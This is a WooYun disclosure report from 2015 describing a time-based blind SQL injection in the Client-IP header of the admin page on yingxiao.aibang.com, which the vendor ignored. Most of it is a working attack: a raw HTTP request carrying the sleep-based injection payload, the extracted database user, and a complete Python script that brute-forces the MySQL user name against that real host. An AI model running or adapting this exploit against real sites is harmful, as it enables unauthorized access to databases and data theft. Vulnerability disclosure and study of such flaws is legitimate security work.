乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-04: 细节已通知厂商并且等待厂商处理中 2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开
http://yingxiao.aibang.com/
后台的HTTP消息头存在延迟注入:
GET /admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Client-IP: aa'XOR(if(length(user())=19,sleep(5),0))OR'bbX-Requested-With: XMLHttpRequestReferer: http://yingxiao.aibang.com/Cookie: PMID=39; PHPSESSID=07580b841bffb98e0787273c2c40d1c5Host: yingxiao.aibang.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*Content-Length: 6
HTTP头中的Client-IP参数有问题~
得到user的长度为19~
猜解得到user()为:
[email protected]
附脚本:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type':'application/x-www-form-urlencoded', 'Cookie': 'PMID=39; PHPSESSID=07580b841bffb98e0787273c2c40d1c5'}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print 'Start to retrive MySQL User:'user = ''for i in range(1, 20): for payload in payloads: try: s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) s = "aa'XOR(if(%s,sleep(60),0))OR'bb" % s headers["Client-IP"]=s conn = httplib.HTTPConnection('yingxiao.aibang.com', timeout=60) conn.request(method='GET', url='/admin/', headers=headers) conn.getresponse() conn.close() print '.', except: user += payload print '\n[in progress]', user, breakprint '\n[Done] MySQL user is %s' % user
危害等级:无影响厂商忽略
忽略时间:2015-05-09 11:06
漏洞Rank:4 (WooYun评价)
暂无